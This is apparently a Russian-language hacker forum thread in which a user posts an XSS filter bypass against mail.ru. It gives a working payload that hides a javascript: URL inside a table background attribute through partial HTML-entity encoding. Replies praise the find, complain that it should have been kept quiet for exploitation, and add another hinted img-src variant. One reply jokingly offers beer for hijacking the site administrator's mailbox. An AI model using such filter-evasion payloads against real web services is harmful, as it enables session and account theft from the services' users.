|
xss mail.ru
Проверяв систему, я удивлся тому что фильтр раскодирует ASC II и Hex до потери пульса =), т е до того пока в значении атрибута будет встечаться комбинация
Код:
&#Код:
&#97кусок слова 'javascr' будет выглядить так : Код:
&#106&#97&#118&#97&#115&#99&#114а XSS бдет выглядеть как то так : фильтр её пропускает, потому что кусок слова закодирован а конец его - нет Код:
<table background="&#106&#97&#118&#97&#115&#99&#114 ipt:alert('Hi from mayor')"> |
Майор, респект за интересную разработку!!! Но, имхо, не туда запостил!
|
[~цензура~] Майор...то что доктор прописал
прим ну не на столько я молод =) |
Респект.
|
Майор, я тебе уже всё сказал =) Респект в общем. Долго ты меня мучил))
|
Майор, молодец, но пожалуй соглашусь с PinkPanther.
|
Имхо о этой баге уже все знали...
Те кто знал, юзал её молча терь ты взял и её разглосил!.... :mad: Следущий раз думай прежде чем как такие баги выкладывать пожалуйста и другим не гадить. |
NEsTor Я понимаю твоё состояние, но тем немение.....оставь всю свою обиду и агрессию при себе.
|
Цитата:
и не указывай что мне делать :) |
Я тебе не указываю, просто подумай в следущий раз о других когда будешь что то такое ценное выкладывать.
|
Найденным нужно делиться. А то это не дело в тихомолку чтобы никто не увидел. Поэтому спасибо что поделился.
|
Ладно не важно, просто Майёр подумай вследущий раз.
всё. |
Цитата:
|
Майор - молодец!!!
Пинк, и Задохликс =). Ну не всё же ценное прятать по карманам =). Дайте народу свежей водицы попить! =) |
Цитата:
|
А здесь вообще все просто:
<img src="java script: дальше знаете ... Кто мыслит, тот поймет ! И спасибо Майору ! |
Ладно, вот щас опять закроют багу, и всё!
Нафиг выкладывать был особенно когда знаем, что закроют. |
И хорошо. Сделаем mail.ru безопасным.
Не все нужно ломать, нужно и оставить то, на чем сидеть. |
закрыли =).
http://forum.sysadmins.ru/9/48051/?start=90 Stellar - админ майл ру =). Кто уведет у него ящик, тому пива обещал =) |
Цитата:
|
| Время: 02:16 |